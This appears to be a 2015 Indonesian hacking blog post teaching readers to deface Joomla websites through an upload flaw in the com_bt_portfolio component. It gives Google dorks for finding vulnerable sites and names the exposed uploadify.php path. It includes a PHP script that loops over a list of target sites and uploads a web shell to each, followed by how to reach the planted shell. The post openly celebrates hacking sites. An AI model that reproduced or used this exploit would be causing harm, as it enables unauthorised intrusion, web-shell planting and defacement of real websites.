Monday, 27 July 2015

Tutorial deface dengan com Bt Portfolio


Hallo fans, Nuenomaru disini , maaf baru bisa posting lagi wkwkw
2 postingan/artikel sebelumnya saya share tutorial bug/celah pada web berCMS Wordpress.
untuk artikel hari ini saya akan share salah satu bug/celah web berCMS Joomla 
kali ini Nue akan share Exploit Tutorial deface dengan com Bt Portfolio, etthoo,, ini exploit gak begitu baru loh ..
hahaha iseng2 aja share kali aja masih crotz 

bahan bahan:
- PC yang tersambung dengan Internet
- Xampp
- Shell & Script Deface
- Kopi , sabun , Lilin (hukumnya sunah wkwkw :v ) 


Langsung intip Tutorialnya

1. Search di google dgn dork:
Dork:
inurl:/index.php?option=com_bt_portfolio
inurl:/bt_portfolio
(Kembangin lg biar dpt banyak web yg vuln and verawan kak)



2. Pilih salah satu web target, dan masukan exploit:
/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php

3. Vuln = Blank
(kalo gak salah wkwkwk)


4).Buat File Baru Berekstensi .php Contoh btport.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit dan taruh juga shell sobat di directory yang sama dgn btport.php tadi 

 <?php


$get=file_get_contents($argv[1]);
$j=explode("\r\n",$get);
foreach($j as $site){
echo "\n\n\t[+] Uploading file to : ".$site;

$uploadfile="shell.php";
$ch =curl_init("trget/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",'folder'=>"/"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);{
print "\n\n\n$postResult";
echo "\n\n\t";
}
}
?>


4. Buka Xampp kalian yang sudah terinstall, nyalakan apace sama mysql nya
5. Buka CMD dan ketikan perintah
cd C:/xampp/php
php namaexploitlo.php

6. jika sukses , akan muncul nama shell sobat di CMD


7. Shell Akses: www.target.co.li/namashellsobat.php

..done.. 


Hahahaha Sekian tutorial kali ini.
numpang ngiklan..
Download MiniGames Android TKJ JumpMan
<re/code> By: TKJ Cyber Art
Link:
Google Drive
sharebeast

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Happy Joomla Hacked !!

Sekian dan semoga bermanfaat .. terimakasih



source and thanks to: Idiot Attacker



./Nuenomaru



















Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2


EmoticonEmoticon